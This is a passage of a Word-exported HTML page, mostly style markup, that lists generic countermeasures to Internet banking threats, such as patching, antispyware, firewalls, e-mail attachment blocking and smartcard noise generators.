<w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 3"> <w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 3"> <w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 3"> <w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 3"> <w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 3"> <w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 3"> <w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 3"> <w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 3"> <w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 3"> <w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 3"> <w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 3"> <w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 3"> <w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 3"> <w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 4"> <w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 4"> <w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 4"> <w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 4"> <w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 4"> <w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 4"> <w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 4"> <w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 4"> <w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 4"> <w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 4"> <w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 4"> <w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 4"> <w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 4"> <w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 4"> <w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 5"> <w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 5"> <w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 5"> <w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 5"> <w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 5"> <w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 5"> <w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 5"> <w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 5"> <w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 5"> <w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 5"> <w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 5"> <w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 5"> <w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 5"> <w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 5"> <w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 6"> <w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 6"> <w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 6"> <w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 6"> <w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 6"> <w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 6"> <w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 6"> <w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 6"> <w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 6"> <w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 6"> <w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 6"> <w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 6"> <w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 6"> <w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 6"> <w:lsdexception locked="false" priority="19" semihidden="false" unhidewhenused="false" qformat="true" name="Subtle Emphasis"> <w:lsdexception locked="false" priority="21" semihidden="false" unhidewhenused="false" qformat="true" name="Intense Emphasis"> <w:lsdexception locked="false" priority="31" semihidden="false" unhidewhenused="false" qformat="true" name="Subtle Reference"> <w:lsdexception locked="false" priority="32" semihidden="false" unhidewhenused="false" qformat="true" name="Intense Reference"> <w:lsdexception locked="false" priority="33" semihidden="false" unhidewhenused="false" qformat="true" name="Book Title"> <w:lsdexception locked="false" priority="37" name="Bibliography"> <w:lsdexception locked="false" priority="39" qformat="true" name="TOC Heading"> </w:LatentStyles> </xml><![endif]--><!--[if gte mso 10]> <style> /* Style Definitions */ table.MsoNormalTable {mso-style-name:"Table Normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-priority:99; mso-style-qformat:yes; mso-style-parent:""; mso-padding-alt:0in 5.4pt 0in 5.4pt; mso-para-margin-top:0in; mso-para-margin-right:0in; mso-para-margin-bottom:10.0pt; mso-para-margin-left:0in; line-height:115%; mso-pagination:widow-orphan; font-size:11.0pt; font-family:"Calibri","sans-serif"; mso-ascii-font-family:Calibri; mso-ascii-theme-font:minor-latin; mso-hansi-font-family:Calibri; mso-hansi-theme-font:minor-latin; mso-bidi-font-family:"Iskoola Pota"; mso-bidi-theme-font:minor-bidi; mso-bidi-language:AR-SA;} </style> <![endif]--> <p class="MsoNormal" style="margin-bottom:0in;margin-bottom:.0001pt;line-height: normal;mso-layout-grid-align:none;text-autospace:none"><span style="mso-bidi-mso-bidi-theme-font:minor-latin;mso-bidi-language: SI-LKfont-family:Calibri;font-size:12.0pt;" >These are some countermeasures I have identified to reduce the risk in Internet banking for each attacks.</span></p> <p class="MsoNormal" style="margin-bottom:0in;margin-bottom:.0001pt;line-height: normal;mso-layout-grid-align:none;text-autospace:none"><span style="mso-bidi-mso-bidi-theme-font:minor-latin;mso-bidi-language: SI-LKfont-family:Calibri;font-size:12.0pt;" > </span></p> <p class="MsoListParagraphCxSpFirst" style="margin-bottom:0in;margin-bottom:.0001pt; mso-add-space:auto;text-indent:-.25in;line-height:normal;mso-list:l4 level1 lfo1; mso-layout-grid-align:none;text-autospace:none"><span style="font-family:Symbol;mso-fareast-font-family:Symbol; mso-bidi-mso-bidi-language:SI-LKfont-family:Symbol;font-size:12.0pt;" ><span style="mso-list: Ignore">·<span style="font:7.0pt "Times New Roman""> <span style="font-weight: bold;"> </span></span></span></span><span style=" font-weight: bold;font-size:12pt;" >User Surveillance</span></p> <p class="MsoListParagraphCxSpLast" style="margin-top:0in;margin-right:0in; margin-bottom:0in;margin-left:1.0in;margin-bottom:.0001pt;mso-add-space:auto; text-indent:-.25in;line-height:normal;mso-list:l4 level2 lfo1;mso-layout-grid-align: none;text-autospace:none"><span style=" font-family:"Courier New";mso-fareast-Courier New";mso-bidi-language: SI-LKfont-family:";font-size:12.0pt;" ><span style="mso-list:Ignore">o<span style="font:7.0pt "Times New Roman""> </span></span></span><span style="mso-bidi-mso-bidi-theme-font:minor-latin;mso-bidi-language:SI-LKfont-family:Calibri;font-size:12.0pt;" >Having a security policy regarding token and password handling.</span></p> <p class="MsoNormal" style="margin-bottom:0in;margin-bottom:.0001pt;line-height: normal;mso-layout-grid-align:none;text-autospace:none"><span style="mso-bidi-mso-bidi-theme-font:minor-latin;mso-bidi-language: SI-LKfont-family:Calibri;font-size:12.0pt;" > </span></p> <p class="MsoListParagraphCxSpFirst" style="margin-bottom:0in;margin-bottom:.0001pt; mso-add-space:auto;text-indent:-.25in;line-height:normal;mso-list:l4 level1 lfo1; mso-layout-grid-align:none;text-autospace:none"><span style="font-family:Symbol;mso-fareast-font-family:Symbol; mso-bidi-mso-bidi-language:SI-LKfont-family:Symbol;font-size:12.0pt;" ><span style="mso-list: Ignore">·<span style="font:7.0pt "Times New Roman""> <span style="font-weight: bold;"> </span></span></span></span><span style=" font-weight: bold;font-size:12pt;" >Theft of token and handwritten notes</span></p> <p class="MsoListParagraphCxSpMiddle" style="margin-top:0in;margin-right:0in; margin-bottom:0in;margin-left:1.0in;margin-bottom:.0001pt;mso-add-space:auto; text-indent:-.25in;line-height:normal;mso-list:l4 level2 lfo1;mso-layout-grid-align: none;text-autospace:none"><span style=" font-family:"Courier New";mso-fareast-Courier New";mso-bidi-language: SI-LKfont-family:";font-size:12.0pt;" ><span style="mso-list:Ignore">o<span style="font:7.0pt "Times New Roman""> </span></span></span><span style="mso-bidi-mso-bidi-theme-font:minor-latin;mso-bidi-language:SI-LKfont-family:Calibri;font-size:12.0pt;" >Having a security policy regarding token and password handling.</span></p> <p class="MsoListParagraphCxSpLast" style="margin-top:0in;margin-right:0in; margin-bottom:0in;margin-left:1.0in;margin-bottom:.0001pt;mso-add-space:auto; text-indent:-.25in;line-height:normal;mso-list:l4 level2 lfo1;mso-layout-grid-align: none;text-autospace:none"><span style=" font-family:"Courier New";mso-fareast-Courier New";mso-bidi-language: SI-LKfont-family:";font-size:12.0pt;" ><span style="mso-list:Ignore">o<span style="font:7.0pt "Times New Roman""> </span></span></span><span style="mso-bidi-mso-bidi-theme-font:minor-latin;mso-bidi-language:SI-LKfont-family:Calibri;font-size:12.0pt;" >Giving passwords that are easy to remember still hard to guess such as combing dictionary word with symbols and numbers.</span></p> <p class="MsoNormal" style="margin-bottom:0in;margin-bottom:.0001pt;line-height: normal;mso-layout-grid-align:none;text-autospace:none"><span style="mso-bidi-mso-bidi-theme-font:minor-latin;mso-bidi-language: SI-LKfont-family:Calibri;font-size:12.0pt;" > </span></p> <p class="MsoListParagraphCxSpFirst" style="margin-bottom:0in;margin-bottom:.0001pt; mso-add-space:auto;text-indent:-.25in;line-height:normal;mso-list:l0 level1 lfo2; mso-layout-grid-align:none;text-autospace:none"><span style="font-family:Symbol;mso-fareast-font-family:Symbol; mso-bidi-mso-bidi-language:SI-LKfont-family:Symbol;font-size:12.0pt;" ><span style="mso-list: Ignore">·<span style="font:7.0pt "Times New Roman""> </span></span></span><span style=" font-weight: bold;font-size:12pt;" >Hidden code</span></p> <p class="MsoListParagraphCxSpMiddle" style="margin-top:0in;margin-right:0in; margin-bottom:0in;margin-left:1.0in;margin-bottom:.0001pt;mso-add-space:auto; text-indent:-.25in;line-height:normal;mso-list:l0 level2 lfo2;mso-layout-grid-align: none;text-autospace:none"><span style=" font-family:"Courier New";mso-fareast-Courier New";mso-bidi-language: SI-LKfont-family:";font-size:12.0pt;" ><span style="mso-list:Ignore">o<span style="font:7.0pt "Times New Roman""> </span></span></span><span style="mso-bidi-mso-bidi-theme-font:minor-latin;mso-bidi-language:SI-LKfont-family:Calibri;font-size:12.0pt;" >Operating System/browser patching</span></p> <p class="MsoListParagraphCxSpMiddle" style="margin-top:0in;margin-right:0in; margin-bottom:0in;margin-left:1.0in;margin-bottom:.0001pt;mso-add-space:auto; text-indent:-.25in;line-height:normal;mso-list:l0 level2 lfo2;mso-layout-grid-align: none;text-autospace:none"><span style=" font-family:"Courier New";mso-fareast-Courier New";mso-bidi-language: SI-LKfont-family:";font-size:12.0pt;" ><span style="mso-list:Ignore">o<span style="font:7.0pt "Times New Roman""> </span></span></span><span style="mso-bidi-mso-bidi-theme-font:minor-latin;mso-bidi-language:SI-LKfont-family:Calibri;font-size:12.0pt;" >Code installation blockers</span></p> <p class="MsoListParagraphCxSpMiddle" style="margin-top:0in;margin-right:0in; margin-bottom:0in;margin-left:1.0in;margin-bottom:.0001pt;mso-add-space:auto; text-indent:-.25in;line-height:normal;mso-list:l0 level2 lfo2;mso-layout-grid-align: none;text-autospace:none"><span style=" font-family:"Courier New";mso-fareast-Courier New";mso-bidi-language: SI-LKfont-family:";font-size:12.0pt;" ><span style="mso-list:Ignore">o<span style="font:7.0pt "Times New Roman""> </span></span></span><span style="mso-bidi-mso-bidi-theme-font:minor-latin;mso-bidi-language:SI-LKfont-family:Calibri;font-size:12.0pt;" >Anispyware software</span></p> <p class="MsoListParagraphCxSpMiddle" style="margin-top:0in;margin-right:0in; margin-bottom:0in;margin-left:1.0in;margin-bottom:.0001pt;mso-add-space:auto; text-indent:-.25in;line-height:normal;mso-list:l0 level2 lfo2;mso-layout-grid-align: none;text-autospace:none"><span style=" font-family:"Courier New";mso-fareast-Courier New";mso-bidi-language: SI-LKfont-family:";font-size:12.0pt;" ><span style="mso-list:Ignore">o<span style="font:7.0pt "Times New Roman""> </span></span></span><span style="mso-bidi-mso-bidi-theme-font:minor-latin;mso-bidi-language:SI-LKfont-family:Calibri;font-size:12.0pt;" >Antiphishing software (URL inspection)</span></p> <p class="MsoListParagraphCxSpMiddle" style="margin-top:0in;margin-right:0in; margin-bottom:0in;margin-left:1.0in;margin-bottom:.0001pt;mso-add-space:auto; text-indent:-.25in;line-height:normal;mso-list:l0 level2 lfo2;mso-layout-grid-align: none;text-autospace:none"><span style=" font-family:"Courier New";mso-fareast-Courier New";mso-bidi-language: SI-LKfont-family:";font-size:12.0pt;" ><span style="mso-list:Ignore">o<span style="font:7.0pt "Times New Roman""> </span></span></span><span style="mso-bidi-mso-bidi-theme-font:minor-latin;mso-bidi-language:SI-LKfont-family:Calibri;font-size:12.0pt;" >Firewall for blocking inbound and outbound connections to unauthorized ports</span></p> <p class="MsoListParagraphCxSpMiddle" style="margin-top:0in;margin-right:0in; margin-bottom:0in;margin-left:1.0in;margin-bottom:.0001pt;mso-add-space:auto; text-indent:-.25in;line-height:normal;mso-list:l0 level2 lfo2;mso-layout-grid-align: none;text-autospace:none"><span style=" font-family:"Courier New";mso-fareast-Courier New";mso-bidi-language: SI-LKfont-family:";font-size:12.0pt;" ><span style="mso-list:Ignore">o<span style="font:7.0pt "Times New Roman""> </span></span></span><span style="mso-bidi-mso-bidi-theme-font:minor-latin;mso-bidi-language:SI-LKfont-family:Calibri;font-size:12.0pt;" >Intrusion/anomaly detection</span></p> <p class="MsoListParagraphCxSpLast" style="margin-top:0in;margin-right:0in; margin-bottom:0in;margin-left:1.0in;margin-bottom:.0001pt;mso-add-space:auto; text-indent:-.25in;line-height:normal;mso-list:l0 level2 lfo2;mso-layout-grid-align: none;text-autospace:none"><span style=" font-family:"Courier New";mso-fareast-Courier New";mso-bidi-language: SI-LKfont-family:";font-size:12.0pt;" ><span style="mso-list:Ignore">o<span style="font:7.0pt "Times New Roman""> </span></span></span><span style="mso-bidi-mso-bidi-theme-font:minor-latin;mso-bidi-language:SI-LKfont-family:Calibri;font-size:12.0pt;" >Best practices for browser security (cookies, window pop-ups, java support, etc)</span></p> <p class="MsoNormal" style="margin-bottom:0in;margin-bottom:.0001pt;line-height: normal;mso-layout-grid-align:none;text-autospace:none"><span style="mso-bidi-mso-bidi-theme-font:minor-latin;mso-bidi-language: SI-LKfont-family:Calibri;font-size:12.0pt;" > </span></p> <p class="MsoListParagraphCxSpFirst" style="margin-bottom:0in;margin-bottom:.0001pt; mso-add-space:auto;text-indent:-.25in;line-height:normal;mso-list:l0 level1 lfo2; mso-layout-grid-align:none;text-autospace:none"><span style="font-family:Symbol;mso-fareast-font-family:Symbol; mso-bidi-mso-bidi-language:SI-LKfont-family:Symbol;font-size:12.0pt;" ><span style="mso-list: Ignore">·<span style="font:7.0pt "Times New Roman""> </span></span></span><span style=" font-weight: bold;font-size:12pt;" >Worms and bots</span></p> <p class="MsoListParagraphCxSpMiddle" style="margin-top:0in;margin-right:0in; margin-bottom:0in;margin-left:1.0in;margin-bottom:.0001pt;mso-add-space:auto; text-indent:-.25in;line-height:normal;mso-list:l0 level2 lfo2;mso-layout-grid-align: none;text-autospace:none"><span style=" font-family:"Courier New";mso-fareast-Courier New";mso-bidi-language: SI-LKfont-family:";font-size:12.0pt;" ><span style="mso-list:Ignore">o<span style="font:7.0pt "Times New Roman""> </span></span></span><span style="mso-bidi-mso-bidi-theme-font:minor-latin;mso-bidi-language:SI-LKfont-family:Calibri;font-size:12.0pt;" >Operating System/browser patching</span></p> <p class="MsoListParagraphCxSpMiddle" style="margin-top:0in;margin-right:0in; margin-bottom:0in;margin-left:1.0in;margin-bottom:.0001pt;mso-add-space:auto; text-indent:-.25in;line-height:normal;mso-list:l0 level2 lfo2;mso-layout-grid-align: none;text-autospace:none"><span style=" font-family:"Courier New";mso-fareast-Courier New";mso-bidi-language: SI-LKfont-family:";font-size:12.0pt;" ><span style="mso-list:Ignore">o<span style="font:7.0pt "Times New Roman""> </span></span></span><span style="mso-bidi-mso-bidi-theme-font:minor-latin;mso-bidi-language:SI-LKfont-family:Calibri;font-size:12.0pt;" >Code installation blockers</span></p> <p class="MsoListParagraphCxSpMiddle" style="margin-top:0in;margin-right:0in; margin-bottom:0in;margin-left:1.0in;margin-bottom:.0001pt;mso-add-space:auto; text-indent:-.25in;line-height:normal;mso-list:l0 level2 lfo2;mso-layout-grid-align: none;text-autospace:none"><span style=" font-family:"Courier New";mso-fareast-Courier New";mso-bidi-language: SI-LKfont-family:";font-size:12.0pt;" ><span style="mso-list:Ignore">o<span style="font:7.0pt "Times New Roman""> </span></span></span><span style="mso-bidi-mso-bidi-theme-font:minor-latin;mso-bidi-language:SI-LKfont-family:Calibri;font-size:12.0pt;" >Anispyware software</span></p> <p class="MsoListParagraphCxSpMiddle" style="margin-top:0in;margin-right:0in; margin-bottom:0in;margin-left:1.0in;margin-bottom:.0001pt;mso-add-space:auto; text-indent:-.25in;line-height:normal;mso-list:l0 level2 lfo2;mso-layout-grid-align: none;text-autospace:none"><span style=" font-family:"Courier New";mso-fareast-Courier New";mso-bidi-language: SI-LKfont-family:";font-size:12.0pt;" ><span style="mso-list:Ignore">o<span style="font:7.0pt "Times New Roman""> </span></span></span><span style="mso-bidi-mso-bidi-theme-font:minor-latin;mso-bidi-language:SI-LKfont-family:Calibri;font-size:12.0pt;" >Custom application secure coding</span></p> <p class="MsoListParagraphCxSpMiddle" style="margin-top:0in;margin-right:0in; margin-bottom:0in;margin-left:1.0in;margin-bottom:.0001pt;mso-add-space:auto; text-indent:-.25in;line-height:normal;mso-list:l0 level2 lfo2;mso-layout-grid-align: none;text-autospace:none"><span style=" font-family:"Courier New";mso-fareast-Courier New";mso-bidi-language: SI-LKfont-family:";font-size:12.0pt;" ><span style="mso-list:Ignore">o<span style="font:7.0pt "Times New Roman""> </span></span></span><span style="mso-bidi-mso-bidi-theme-font:minor-latin;mso-bidi-language:SI-LKfont-family:Calibri;font-size:12.0pt;" >Firewall for blocking inbound and outbound connections to unauthorized ports</span></p> <p class="MsoListParagraphCxSpMiddle" style="margin-top:0in;margin-right:0in; margin-bottom:0in;margin-left:1.0in;margin-bottom:.0001pt;mso-add-space:auto; text-indent:-.25in;line-height:normal;mso-list:l0 level2 lfo2;mso-layout-grid-align: none;text-autospace:none"><span style=" font-family:"Courier New";mso-fareast-Courier New";mso-bidi-language: SI-LKfont-family:";font-size:12.0pt;" ><span style="mso-list:Ignore">o<span style="font:7.0pt "Times New Roman""> </span></span></span><span style="mso-bidi-mso-bidi-theme-font:minor-latin;mso-bidi-language:SI-LKfont-family:Calibri;font-size:12.0pt;" >Intrusion/anomaly detection</span></p> <p class="MsoListParagraphCxSpLast" style="margin-top:0in;margin-right:0in; margin-bottom:0in;margin-left:1.0in;margin-bottom:.0001pt;mso-add-space:auto; text-indent:-.25in;line-height:normal;mso-list:l0 level2 lfo2;mso-layout-grid-align: none;text-autospace:none"><span style=" font-family:"Courier New";mso-fareast-Courier New";mso-bidi-language: SI-LKfont-family:";font-size:12.0pt;" ><span style="mso-list:Ignore">o<span style="font:7.0pt "Times New Roman""> </span></span></span><span style="mso-bidi-mso-bidi-theme-font:minor-latin;mso-bidi-language:SI-LKfont-family:Calibri;font-size:12.0pt;" >Best practices for browser security (cookies, window pop-ups, java support, etc)</span></p> <p class="MsoNormal" style="margin-bottom:0in;margin-bottom:.0001pt;line-height: normal;mso-layout-grid-align:none;text-autospace:none"><span style="mso-bidi-mso-bidi-theme-font:minor-latin;mso-bidi-language: SI-LKfont-family:Calibri;font-size:12.0pt;" > </span></p> <p class="MsoListParagraphCxSpFirst" style="margin-bottom:0in;margin-bottom:.0001pt; mso-add-space:auto;text-indent:-.25in;line-height:normal;mso-list:l2 level1 lfo3; mso-layout-grid-align:none;text-autospace:none"><span style="font-family:Symbol;mso-fareast-font-family:Symbol; mso-bidi-mso-bidi-language:SI-LKfont-family:Symbol;font-size:12.0pt;" ><span style="mso-list: Ignore">·<span style="font:7.0pt "Times New Roman""> </span></span></span><span style=" font-weight: bold;font-size:12pt;" >E-mails with malicious code</span></p> <p class="MsoListParagraphCxSpMiddle" style="margin-top:0in;margin-right:0in; margin-bottom:0in;margin-left:1.0in;margin-bottom:.0001pt;mso-add-space:auto; text-indent:-.25in;line-height:normal;mso-list:l2 level2 lfo3;mso-layout-grid-align: none;text-autospace:none"><span style=" font-family:"Courier New";mso-fareast-Courier New";mso-bidi-language: SI-LKfont-family:";font-size:12.0pt;" ><span style="mso-list:Ignore">o<span style="font:7.0pt "Times New Roman""> </span></span></span><span style="mso-bidi-mso-bidi-theme-font:minor-latin;mso-bidi-language:SI-LKfont-family:Calibri;font-size:12.0pt;" >E-mail policy</span></p> <p class="MsoListParagraphCxSpMiddle" style="margin-top:0in;margin-right:0in; margin-bottom:0in;margin-left:1.0in;margin-bottom:.0001pt;mso-add-space:auto; text-indent:-.25in;line-height:normal;mso-list:l2 level2 lfo3;mso-layout-grid-align: none;text-autospace:none"><span style=" font-family:"Courier New";mso-fareast-Courier New";mso-bidi-language: SI-LKfont-family:";font-size:12.0pt;" ><span style="mso-list:Ignore">o<span style="font:7.0pt "Times New Roman""> </span></span></span><span style="mso-bidi-mso-bidi-theme-font:minor-latin;mso-bidi-language:SI-LKfont-family:Calibri;font-size:12.0pt;" >Code installation blockers</span></p> <p class="MsoListParagraphCxSpMiddle" style="margin-top:0in;margin-right:0in; margin-bottom:0in;margin-left:1.0in;margin-bottom:.0001pt;mso-add-space:auto; text-indent:-.25in;line-height:normal;mso-list:l2 level2 lfo3;mso-layout-grid-align: none;text-autospace:none"><span style=" font-family:"Courier New";mso-fareast-Courier New";mso-bidi-language: SI-LKfont-family:";font-size:12.0pt;" ><span style="mso-list:Ignore">o<span style="font:7.0pt "Times New Roman""> </span></span></span><span style="mso-bidi-mso-bidi-theme-font:minor-latin;mso-bidi-language:SI-LKfont-family:Calibri;font-size:12.0pt;" >Attachment blocking</span></p> <p class="MsoListParagraphCxSpMiddle" style="margin-top:0in;margin-right:0in; margin-bottom:0in;margin-left:1.0in;margin-bottom:.0001pt;mso-add-space:auto; text-indent:-.25in;line-height:normal;mso-list:l2 level2 lfo3;mso-layout-grid-align: none;text-autospace:none"><span style=" font-family:"Courier New";mso-fareast-Courier New";mso-bidi-language: SI-LKfont-family:";font-size:12.0pt;" ><span style="mso-list:Ignore">o<span style="font:7.0pt "Times New Roman""> </span></span></span><span style="mso-bidi-mso-bidi-theme-font:minor-latin;mso-bidi-language:SI-LKfont-family:Calibri;font-size:12.0pt;" >HTML code blocking</span></p> <p class="MsoListParagraphCxSpMiddle" style="margin-top:0in;margin-right:0in; margin-bottom:0in;margin-left:1.0in;margin-bottom:.0001pt;mso-add-space:auto; text-indent:-.25in;line-height:normal;mso-list:l2 level2 lfo3;mso-layout-grid-align: none;text-autospace:none"><span style=" font-family:"Courier New";mso-fareast-Courier New";mso-bidi-language: SI-LKfont-family:";font-size:12.0pt;" ><span style="mso-list:Ignore">o<span style="font:7.0pt "Times New Roman""> </span></span></span><span style="mso-bidi-mso-bidi-theme-font:minor-latin;mso-bidi-language:SI-LKfont-family:Calibri;font-size:12.0pt;" >Antispam software</span></p> <p class="MsoListParagraphCxSpMiddle" style="margin-top:0in;margin-right:0in; margin-bottom:0in;margin-left:1.0in;margin-bottom:.0001pt;mso-add-space:auto; text-indent:-.25in;line-height:normal;mso-list:l2 level2 lfo3;mso-layout-grid-align: none;text-autospace:none"><span style=" font-family:"Courier New";mso-fareast-Courier New";mso-bidi-language: SI-LKfont-family:";font-size:12.0pt;" ><span style="mso-list:Ignore">o<span style="font:7.0pt "Times New Roman""> </span></span></span><span style="mso-bidi-mso-bidi-theme-font:minor-latin;mso-bidi-language:SI-LKfont-family:Calibri;font-size:12.0pt;" >Anispyware software</span></p> <p class="MsoListParagraphCxSpMiddle" style="margin-top:0in;margin-right:0in; margin-bottom:0in;margin-left:1.0in;margin-bottom:.0001pt;mso-add-space:auto; text-indent:-.25in;line-height:normal;mso-list:l2 level2 lfo3;mso-layout-grid-align: none;text-autospace:none"><span style=" font-family:"Courier New";mso-fareast-Courier New";mso-bidi-language: SI-LKfont-family:";font-size:12.0pt;" ><span style="mso-list:Ignore">o<span style="font:7.0pt "Times New Roman""> </span></span></span><span style="mso-bidi-mso-bidi-theme-font:minor-latin;mso-bidi-language:SI-LKfont-family:Calibri;font-size:12.0pt;" >Antiphishing software (URL inspection)</span></p> <p class="MsoListParagraphCxSpMiddle" style="margin-top:0in;margin-right:0in; margin-bottom:0in;margin-left:1.0in;margin-bottom:.0001pt;mso-add-space:auto; text-indent:-.25in;line-height:normal;mso-list:l2 level2 lfo3;mso-layout-grid-align: none;text-autospace:none"><span style=" font-family:"Courier New";mso-fareast-Courier New";mso-bidi-language: SI-LKfont-family:";font-size:12.0pt;" ><span style="mso-list:Ignore">o<span style="font:7.0pt "Times New Roman""> </span></span></span><span style="mso-bidi-mso-bidi-theme-font:minor-latin;mso-bidi-language:SI-LKfont-family:Calibri;font-size:12.0pt;" >Firewall for blocking inbound and outbound connections to unauthorized ports</span></p> <p class="MsoListParagraphCxSpLast" style="margin-top:0in;margin-right:0in; margin-bottom:0in;margin-left:1.0in;margin-bottom:.0001pt;mso-add-space:auto; text-indent:-.25in;line-height:normal;mso-list:l2 level2 lfo3;mso-layout-grid-align: none;text-autospace:none"><span style=" font-family:"Courier New";mso-fareast-Courier New";mso-bidi-language: SI-LKfont-family:";font-size:12.0pt;" ><span style="mso-list:Ignore">o<span style="font:7.0pt "Times New Roman""> </span></span></span><span style="mso-bidi-mso-bidi-theme-font:minor-latin;mso-bidi-language:SI-LKfont-family:Calibri;font-size:12.0pt;" >Intrusion/anomaly detection</span></p> <p class="MsoNormal" style="margin-bottom:0in;margin-bottom:.0001pt;line-height: normal;mso-layout-grid-align:none;text-autospace:none"><span style="mso-bidi-mso-bidi-theme-font:minor-latin;mso-bidi-language: SI-LKfont-family:Calibri;font-size:12.0pt;" > </span></p> <p class="MsoListParagraphCxSpFirst" style="margin-bottom:0in;margin-bottom:.0001pt; mso-add-space:auto;text-indent:-.25in;line-height:normal;mso-list:l2 level1 lfo3; mso-layout-grid-align:none;text-autospace:none"><span style="font-family:Symbol;mso-fareast-font-family:Symbol; mso-bidi-mso-bidi-language:SI-LKfont-family:Symbol;font-size:12.0pt;" ><span style="mso-list: Ignore">·<span style="font:7.0pt "Times New Roman""> </span></span></span><span style=" font-weight: bold;font-size:12pt;" >Smartcard analyzers</span></p> <p class="MsoListParagraphCxSpMiddle" style="margin-top:0in;margin-right:0in; margin-bottom:0in;margin-left:1.0in;margin-bottom:.0001pt;mso-add-space:auto; text-indent:-.25in;line-height:normal;mso-list:l2 level2 lfo3;mso-layout-grid-align: none;text-autospace:none"><span style=" font-family:"Courier New";mso-fareast-Courier New";mso-bidi-language: SI-LKfont-family:";font-size:12.0pt;" ><span style="mso-list:Ignore">o<span style="font:7.0pt "Times New Roman""> </span></span></span><span style="mso-bidi-mso-bidi-theme-font:minor-latin;mso-bidi-language:SI-LKfont-family:Calibri;font-size:12.0pt;" >Noise generators</span></p> <p class="MsoListParagraphCxSpLast" style="margin-top:0in;margin-right:0in; margin-bottom:0in;margin-left:1.0in;margin-bottom:.0001pt;mso-add-space:auto; text-indent:-.25in;line-height:normal;mso-list:l2 level2 lfo3;mso-layout-grid-align: none;text-autospace:none"><span style=" font-family:"Courier New";mso-fareast-Courier New";mso-bidi-language: SI-LKfont-family:";font-size:12.0pt;" ><span style="mso-list:Ignore">o<span style="font:7.0pt "Times New Roman""> </span></span></span><span style="mso-bidi-mso-bidi-theme-font:minor-latin;mso-bidi-language:SI-LKfont-family:Calibri;font-size:12.0pt;" >Power and time neutral code designing</span></p> <p 